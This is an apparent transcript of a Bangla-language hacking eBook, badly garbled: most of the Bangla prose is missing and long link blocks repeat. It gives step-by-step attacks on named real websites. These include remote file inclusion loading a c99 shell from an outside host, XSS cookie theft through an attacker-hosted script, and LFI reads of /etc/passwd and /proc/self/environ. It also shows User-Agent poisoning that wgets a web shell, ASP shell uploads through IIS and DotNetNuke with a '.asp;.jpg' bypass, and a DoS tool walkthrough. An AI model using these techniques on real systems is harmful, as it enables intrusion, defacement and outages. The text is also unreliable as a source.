Hacking Bangla eBook
If you can't read please download the document
Transcript of Hacking Bangla eBook
-
Mystrious Tusin Jack nax
Cyan Tarek
pirate_king Log Out
, -
,
-,
www.fb.com/md.faroqueahmed
http://www.fb.com/md.faroqueahmed -
-
,
(
,
White Hat Hacker)-
Grey Hat Hacker)-
Black Hat Hacker)-
-
Script Kidie)-
Neophyte or nOOb)-
Blue Hat Hacker)-
-
www.hackerthreads.orgwww.hackforums.netwww.hacker.org/forumwww.crackhackforum.com
, , ,
http://www.ethicalhacker.net/http://insecure.org/http://hacker.resourcez.com/http://www.certifiedethicalhacker.com/http://www.elitehack.net/http://www.elite-hackers.com/http://www.exploit-
db.com/http://www.1337day.com/http://www.breakthesecurity.com/http://www.thehackerslibrary.com/http://www.port7alliance.com/http://www.hackers.nl/http://hackmein.tripod.com/http://kyrionhackingtutorials.com/http
://www.hacking-gurus.net/http://hackmyass.wordpress.com/http://www.borntohack.in/http://www.criticalsecurity.net/http://ww
w.mpgh.net/http://www.duniapassword.com/http://www.progamercity.net/
www.hackerthreads.orgwww.hackforums.netwww.hacker.org/forumwww.crackhackforum.comhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ethicalhacker.net%2Fhttp%3A%2F%2Finsecure.org%2Fhttp%3A%2F%2Fhacker.resourcez.com%2Fhttp%3A%2F%2Fwww.certifiedethicalhacker.com%2Fhttp%3A%2F%2Fwww.elitehack.net%2Fhttp%3A%2F%2Fwww.elite-hackers.com%2Fhttp%3A%2F%2Fwww.exploit-db.com%2Fhttp%3A%2F%2Fwww.1337day.com%2Fhttp%3A%2F%2Fwww.breakthesecurity.com%2Fhttp%3A%2F%2Fwww.thehackerslibrary.com%2Fhttp%3A%2F%2Fwww.port7alliance.com%2Fhttp%3A%2F%2Fwww.hackers.nl%2Fhttp%3A%2F%2Fhackmein.tripod.com%2Fhttp%3A%2F%2Fkyrionhackingtutorials.com%2Fhttp%3A%2F%2Fwww.hacking-gurus.net%2Fhttp%3A%2F%2Fhackmyass.wordpress.com%2Fhttp%3A%2F%2Fwww.borntohack.in%2Fhttp%3A%2F%2Fwww.criticalsecurity.net%2Fhttp%3A%2F%2Fwww.mpgh.net%2Fhttp%3A%2F%2Fwww.duniapassword.com%2Fhttp%3A%2F%2Fwww.progamercity.net%2F%E0%A6%B9%E0%A7%8D%E0%A6%AF%E0%A6%BE%E0%A6%95%E0%A6%BE%E0%A6%B0&h=bAQFCDiY5&s=1 -
TRON (1982), THE GIRL WITH THE DRAGON TATTOO (2009), WARGAMES (1983), DIE HARD 4:LIVE FREE OR DIE HARD (2007), SNEAKERS (1992), THE MATRIX (1999), EXISTENZ (1999), THE
CONVERSATION (1974), THE SCORE (2001), FOOLPROOF (2003), HACKER (1995), ANTITRUST (2001), PIRATES OFSILICONVALLEY(1999), THE LAWNMOWER MAN (1992), THE CORE (2003),
VIRTUOSITY (1995), TAKEDOWN (2000), DEJA VU (2006), ONE POINT O (2004), REVOLUTION OS (2001), THE NET (1995), TRON : LEGACY (2010), THE ITALIAN JOB (2003), DISCLOSURE (1994),
JURASSICPARK(1993), SWORDFISH (2001), THE THIRTEENTH FLOOR (1999), UNTRACEABLE (2008), GAMER (2009)
-
?
IP Address ??
IP Address ? IP Address Internet ProtocolAddress Network-
Device- Communication- Internet Protocol IP Address
Unique, IP Address
IP Address Network Internet ServiceProvider-
Internet IPAddress-
IP Address- ? IP Address-
1.Host Network Interface , Communication
2.Network IP Address ,
Network IPAddress- IP Adderss-
Binary Number, (
IP Address- Version
IP Address. IPAddress- Network
, IP Address
Start->Run-> cmd -netstat n
www.whatismyip.com
-
ftp ->21smtp >25dns ->53http >80https ->81pop3 ->110telnet >23
?
Start->Run-> cmd -tracert websitename
tracert yahoo.com
,
-
-
,
?
nslookup
You are now authentized to this route
,
www.samspade.comwww.dnsstuff.comwww.whois.net www.who.is
, , , , ,
,
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.samspade.com&h=dAQGgUIjv&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.samspade.com&h=dAQGgUIjv&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.whois.net&h=0AQG0Pdqc&s=1http://www.who.is/ -
Reply- Show original
gmail
?
gmail https
http Hyper Text Transfer Protocol. https http secured
, ,
http://readnotify.com/
http://www.didtheyreadit.com/
http://www.pointofmail.com/
http://www.ip2location.com/
?
netstat -n ?
, ,
ICQ Messenger,
MSN Messenger, Yahoo Messenger, Gtalk, Meebo, Gigsby, AIM
?
http://readnotify.com/http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.didtheyreadit.com%2F&h=lAQH_OKW9&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.ip2location.com%2F&h=fAQEx51ZH&s=1 -
- ICQ Messenger ICQ Messenger ( - > - >
Start->Run->cmd->netstat -n
Start->Run->cmd-
>netstat -n
-
.::: Yahoo Messenger, MSN Messenger, GTalk Messenger :::.
- - -,
(
,
-
,
,
?
-
.::: Meebo, Gigsby, Trillion :::.
-
- ( -
Forget password
,
, ?
,
,
Forget password
,
, ?
,
, ,
-
, Congrats! You have got 100000 free visitor, CLICK
HERE for withdraw.
>impersonation
>posing as imp. user
>3rd person approach
>technical support
>mail/im attachments
>pop up windows
>sweepstakes
>spam mail
-
-
Remote file inclusion ,
,
Remote file inclusion , RFI
vulnerability
vulnerability remote file
RFI
vulnerable ? ? , ?
http://www.targetsite.com/index.php?page=Anything
,
? ?
,
vulnerable ?
http://www.targetsite.com/index.php?page=www.google.com
http://www.cbspk.com/
vulnerable
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com
-
RFI
Shells ,
c99 shell r57 shell
c99 shell
- ripway.com, 110mb.com ripway.com
http://h1.ripway.com/tjunselected/c99shell.php?
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
, ?
- http://www.facebook.com/groups/hackingwrld/doc/442052402551337/
-
XSS ?
XSS XSS ? Cross site Scripting
XSS CSS(Cascading Style sheet) Web
Application Vulnerability vulnerability
client side scripts ( Javascript) vulnerability
malicious codes, malware attack, phishing inject
http://3.bp.blogspot.com/_lBoKsfWMhbE/TLYDr8vQmTI/AAAAAAAAAAM/V1wVWY0GB70/s1600/
xss-threat3.jpg
XSS Vulnerability and Injection
Vulnerable
Vulnerable Google Google Dorks
Vulnerable sql Injection "search?q="
Vulnerable
Vulnerability
, Vulnerability
parameter ?
,
search query, username, password.
Vulnerability
injection
malcious script ,
malcious script
http://2.bp.blogspot.com/-
8z5CXuZZpeg/TpgBgtdbdBI/AAAAAAAAAsE/qCTc_dxniWE/s1600/search+box.jpg
URL injection
URL - htp://vulnerablewebsite/search?q=malicious_script_goes_here
http://3.bp.blogspot.com/_lBoKsfWMhbE/TLYDr8vQmTI/AAAAAAAAAAM/V1wVWY0GB70/s1600/xss-threat3.jpghttp://3.bp.blogspot.com/_lBoKsfWMhbE/TLYDr8vQmTI/AAAAAAAAAAM/V1wVWY0GB70/s1600/xss-threat3.jpghttp://www.facebook.com/l.php?u=http%3A%2F%2F2.bp.blogspot.com%2F-8z5CXuZZpeg%2FTpgBgtdbdBI%2FAAAAAAAAAsE%2FqCTc_dxniWE%2Fs1600%2Fsearch%2Bbox.jpg&h=EAQEw3axp&s=1http://www.facebook.com/l.php?u=http%3A%2F%2F2.bp.blogspot.com%2F-8z5CXuZZpeg%2FTpgBgtdbdBI%2FAAAAAAAAAsE%2FqCTc_dxniWE%2Fs1600%2Fsearch%2Bbox.jpg&h=EAQEw3axp&s=1 -
input fields
-
- http://vulnerablewebsite/search?q=
XSS
vulnerable.
Malicious Scripts
Vulnerability , malicious scripts
cookies malware attack
cookie stealing script malicious script url
http://attackerSite/malicious.js
malcious script vulnerable site inject URL
, malcious script
XSS persisting capability Persistent
Non-Persistent
Persistent XSS:
XSS vulnerability.
malicious script injection ,
malicious script injection , - , search query
XSS permanent storage.
Non-Persistent XSS:
Reflected XSS malicious script
,
injection ,
- malicious code temporarily .
Vulnerability ?
Bypassing restriction
-
Session Hijacking Malware Attack
Website Defacement Dos attacks
http://www.facebook.com/groups/hackingwrld/doc/442052402551337/ -
,
,
,
LFI!
Local File Inclusion.
- LFI Injection
PHP
$page=$_GET[page]; include($page);
?>
php
$page sanitized
LFI
,
www.mywebsite.com/index.php?page=products.php
, ,
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3Dproducts.php&h=tAQGTF0s9&s=1 -
, URL
www.mywebsite.com/index.php?page=mypage.php
, mypage.php
, php error message -
Warning:
include() [function.include]: Failed opening 'mypage.php' for
inclusion.........
, vulnerable
unix server , etc/passwd
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
www.mywebsite.com/index.php?page=products
,
.php
?page=products
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3Dmypage.php&h=KAQFbb-UH&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2Fetc%2Fpasswd&h=mAQHR6S3p&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2F..%2Fetc%2Fpasswd&h=7AQHEe7P_&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2F..%2F..%2Fetc%2Fpasswd&h=FAQEcgb4B&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2F..%2F..%2F..%2Fetc%2Fpasswd&h=eAQFKeJrA&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3Dproducts&h=oAQHJUedd&s=1 -
php
$page=$_GET[page];
?>
null extension
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
,
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
------------------------------------------------------------------------------------------
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2Fetc%2Fpasswd&h=LAQHPPIH3&s=1http://www.mywebsite.com/index.php?page=../../etc/passdhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2F..%2F..%2Fetc%2Fpasswd&h=QAQFGx24O&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mywebsite.com%2Findex.php%3Fpage%3D..%2F..%2F..%2F..%2Fetc%2Fpasswd&h=lAQH_OKW9&s=1http://www.facebook.com/groups/hackingwrld/doc/453565801399997/ -
Requirements:
1) Site vulnerable to LFI ( http://www.site.com)
2) Remoteshell( http://www.yourhosting/urshell.txt)
3) User-Agent_switcher( https://addons.mozilla.org/en-US/firefox -switcher/
4) Mozilla Firefox Browser
LFI vulnerable
index.php?homepage=
index.php?page=
index.php?index2=
allinurl:index.php?page=
replace 'index' and 'page'
allinurl:site.php?site=
http://www.filllpg.co.uk/index.php?page=contacts.php
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.site.com&h=sAQFUwvpn&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.yourhosting%2Furshell.txt&h=JAQHDN-eJ&s=1http://www.facebook.com/l.php?u=https%3A%2F%2Faddons.mozilla.org%2Fen-US%2Ffirefox&h=pAQEsApFv&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.filllpg.co.uk%2Findex.php%3Fpage%3Dcontacts.php&h=kAQHyU3qM&s=1 -
replace contacts.php 'null',
http://www.filllpg.co.uk/index.php?page=null
If you see a list of errors running down the page, or missing content
(pictures, text etc.), then the site is vulnerable and we may continue,
otherwise just move on to the next site.
Now, we're going to try and connect to a file which we know exists on Linux
servers, /etc/passwd.
Since index.php has the rights to connect to a file like contacts.php, it's
possible that the administrator has forgottten to restrict its access to other
files, including the files containing sensitive data.
We're going to try to read the file "/etc/passwd" which contains data
on root users, etc.
null etc/passwd
etc/passwd
http://www.filllpg.co.uk/index.php?page=/etc/passwd
http://2.bp.blogspot.com/ -YAu_DU3GnIo/UKBUrssob4I/AAAAAAAAAnc/HqzZkWe3Mag/s1600/1.JPG
/etc/passwd proc/self/environ/
http://www.filllpg.co.uk/index.php?page=/proc/self/environ
http://2.bp.blogspot.com/-qNdN6g9o1Mw/UKBU-FTOEGI/AAAAAAAAAnk/YY7AfqVLRlw/s1600/2.JPG
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.filllpg.co.uk%2Findex.php%3Fpage%3Dnull&h=1AQH8W6-s&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.filllpg.co.uk%2Findex.php%3Fpage%3D%2Fetc%2Fpasswd&h=GAQGVPgm3&s=1http://2.bp.blogspot.com/-YAu_DU3GnIo/UKBUrssob4I/AAAAAAAAAnc/HqzZkWe3Mag/s1600/1.JPGhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.filllpg.co.uk%2Findex.php%3Fpage%3D%2Fproc%2Fself%2Fenviron&h=NAQE-1n27&s=1http://2.bp.blogspot.com/-qNdN6g9o1Mw/UKBU-FTOEGI/AAAAAAAAAnk/YY7AfqVLRlw/s1600/2.JPG -
User-Agent switcher Tools > Default User-Agent
> Edit User Agents
http://4.bp.blogspot.com/ -fh7-99XttP4/TocL11IQMjI/AAAAAAAAANM/gzecxiOXVFA/s400/1.JPG
new user-agent New > New User-Agent.
http://3.bp.blogspot.com/ -WD_WKG02RTQ/TocL5ww6j5I/AAAAAAAAANQ/WM_jJ7BPEaI/s400/2.JPG
, Description
User-Agent User-Agent Tools
> Default User Agent > PHP Info
: http://2.bp.blogspot.com/ -
kpML0wTbmOY/UKBV_gC2FTI/AAAAAAAAAoE/PpFQMVpKzbU/s1600/6.JPG
Ctrl+F
disable_functions
| no value | no value
http://www.facebook.com/groups/hackingwrld/doc/453565801399997/http://4.bp.blogspot.com/-fh7-99XttP4/TocL11IQMjI/AAAAAAAAANM/gzecxiOXVFA/s400/1.JPGhttp://3.bp.blogspot.com/-WD_WKG02RTQ/TocL5ww6j5I/AAAAAAAAANQ/WM_jJ7BPEaI/s400/2.JPGhttp://2.bp.blogspot.com/-kpML0wTbmOY/UKBV_gC2FTI/AAAAAAAAAoE/PpFQMVpKzbU/s1600/6.JPGhttp://2.bp.blogspot.com/-kpML0wTbmOY/UKBV_gC2FTI/AAAAAAAAAoE/PpFQMVpKzbU/s1600/6.JPG -
User-Agent
Edit
-
http://www.sh3ll.org/egy.txt -O shell.php');?>[
?
txt File --> Save as
shell.php
http://www.site.com/shell.php
http://3.bp.blogspot.com/ -
SRkz9h0d8so/UKBWLQD1FMI/AAAAAAAAAoM/lpGNG1UgYMs/s1600/7.JPG
LFI http://pastebin.ca/2385927
http://www.youtube.com/watch?v=FP229bKm5v4
http://www.youtube.com/watch?v=9W9qWAhwaTo
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.sh3ll.org%2Fegy.txt&h=UAQHlcOrqhttp://www.facebook.com/l.php?u=http%3A%2F%2Fwww.site.com%2Fshell.php&h=WAQF599XI&s=1http://3.bp.blogspot.com/-SRkz9h0d8so/UKBWLQD1FMI/AAAAAAAAAoM/lpGNG1UgYMs/s1600/7.JPGhttp://3.bp.blogspot.com/-SRkz9h0d8so/UKBWLQD1FMI/AAAAAAAAAoM/lpGNG1UgYMs/s1600/7.JPGhttp://www.facebook.com/l.php?u=http%3A%2F%2Fpastebin.ca%2F2385927&h=HAQFMgBDK&s=1http://www.facebook.com/groups/hackingwrld/doc/453565801399997/http://www.facebook.com/groups/hackingwrld/doc/453565801399997/http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DFP229bKm5v4&h=IAQFwyDZH&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D9W9qWAhwaTo&h=HAQFMgBDK&s=1 -
http://www.youtube.com/watch?v=hMguilRsteY
-
http://www.youtube.com/watch?v=hMguilRsteYhttp://www.facebook.com/groups/hackingwrld/doc/453565801399997/http://www.facebook.com/groups/hackingwrld/doc/453565801399997/ -
,
?
IIS(IIS=The Internet Information Server Attack)
Run
%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{BDEADF00-C265-11d0-BCED-
00A0C90AB50F}
Enter
Right click New>Add Web Folder>vulnerable website address .
Google Dork :-
Next>Next>Finish .
http://www.target.com/deface.html
http://www.youtube.com/watch?v=P4ISzsSBTik
Microsoft vulnerability , vulnerable
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.target.com%2Fdeface.html&h=8AQE_HWzJ&s=1http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DP4ISzsSBTik&h=kAQHyU3qM&s=1 -
>> >>
IIS Exploit ? ?
IIS Exploit , icon smile IIS Exploit
My Computer Add a network Location
Next
-
Next
http://i1085.photobucket.com/albums/j431/powerin10/no3.jpg
vuln website Next http://www.myxixia.com/
http://i1085.photobucket.com/albums/j431/powerin10/no3.jpghttp://www.myxixia.com/ -
Next
Finish
-
Network Location Option > website folder
shell
www.ziddu.com/download/16498227/shell.zip.html
Extract
-
Power.asp;.jpg
-
power.asp;.jpg
-
power.asp;.jpg
http://www .myxixia.com/power.asp;.jpg
index.asp
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.myxixia.com%2Fpower.asp%3B.jpg&h=tAQGTF0s9&s=1 -
deface html
open with notepad
-
index.asp
-
http://www.youtube.com/watch?v=iG-cjssooVg&feature=related
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DiG-cjssooVg%26feature%3Drelated&h=RAQEZIvjF&s=1 -
DNN ? DNN ASP) Bug).
Dot Net Nuke
? , Vulnerable Hackable.
Vulnerable ?
Vulnerable
Vulnerable
File (A File On Your Site)
-
Script Upload Browse
Browse Jpg,Gif,swf Upload Upload
portals/0/ Upload target.net Upload
test.swf http://www.Target.net/portals/0/test.swf
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.Target.net%2Fportals%2F0%2Ftest.swf&h=gAQFZqdb5&s=1 -
swf) Animation Upload ,
http://www.mediafire.com/?irruu15qetlebuj >> >> STOP
ASP
http://www.mediafire.com/download/roi2g28hhyi0r6x/aspydrv.zip
ASP
maruf.asp;.jpg
ASP PHP
http:// com/portals/0/maruf.asp;.jpg Hackable
Advance Backconnect Root
http://www.youtube.com/watch?v=3KVi3_Fkkww
,P1n1X_Cr3w
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mediafire.com%2F%3Firruu15qetlebuj&h=1AQH8W6-s&s=1http://www.mediafire.com/download/roi2g28hhyi0r6x/aspydrv.zip%20http://www.facebook.com/l.php?u=http%3A%2F%2F%E0%A6%AD%E0%A6%BF%E0%A6%95%E0%A7%8D%E0%A6%9F%E0%A6%BF%E0%A6%AE.com%2Fportals%2F0%2Fmaruf.asp%3B.jpg&h=ZAQE_IVKC&s=1http://www.youtube.com/watch?v=3KVi3_Fkkww -
- - DdoS ? DdoS ?
DdoS ?
DoS ? DDoS DoS ?
DoS Denial of Service DoS
TCP / UDP
?
,
Denial of Service
DDoS Distributed Denial of Service
- ? DDoS
DoS DDoS
? :S ?
DoS DDoS
-
DoS
DDoS
-
D0S / DDoS attack ?
DoS/DDoS sysadmin
,
sysadmin
DoS / DDoS ?
DoS / DDoS
-
, ,
-
--------------------------------------------------------------------------------------------------------------------------------------
---------------------- ########################################################################################
DdoS ? DdoS ? DdoS ?
Ddos
DdoS
http://uptime.netcraft.com
http://www.facebook.com/l.php?u=http%3A%2F%2Fuptime.netcraft.com&h=UAQHlcOrq&s=1 -
Apache/1.3.27 ( Unix)
Apache 1.x Apache 2.x
GoAhead WebServer
---------------------------------------------------------------------------------------------------------------------------------------
--------------------- ########################################################################################
DoS ? DoS ?
,
,
Extract
http://www.mediafire.com/?famiivi799a9459
Run as
administrator
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.mediafire.com%2F%3Ffamiivi799a9459&h=eAQFKeJrA&s=1 -
URL
( ,
http://www.alexa.com/topsites/ , ,
lock on"
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.alexa.com%2Ftopsites%2F&h=fAQEx51ZH&s=1 -
http"
-
Threads 1000
-
EMMA CHARGIN MAH LAZER"
------------------------------------------------------------------------------------------------------------------------------------------------------------ ######################################################################################## DoS / DDoS ?
-
,
,
CMD
netstat - -d: -f1 | sort | uniq -c | sort -n
icon sad
APF firewall CMD
apf -d xx.xx.xx.xx
CSF firewall
csf -d xx.xx.xx.xx
, iptables
iptables -I INPUT 1 -s -j DROP xx.xx.xx.xx
xx.xx.xx.xx
,
, ,
-
,
Microsoft Knowledge Base (KB)
150543
http://support.microsoft.com/default.aspx?scid=kb;en-us;150543&sd=tech
System File Checking ( SFC) ]
Internet Connection Firewall ( IFC ) ]
HTTP, SMTP, FTP, IMAP,
POP
icon smile
http://www.symantec.com/index.jsp http://www.symantec.com/index.jsp http://www.zonealarm.com/ http://www.comodo.com/
DoS / DDoS attack RioRey
- pirate_king >>>>>
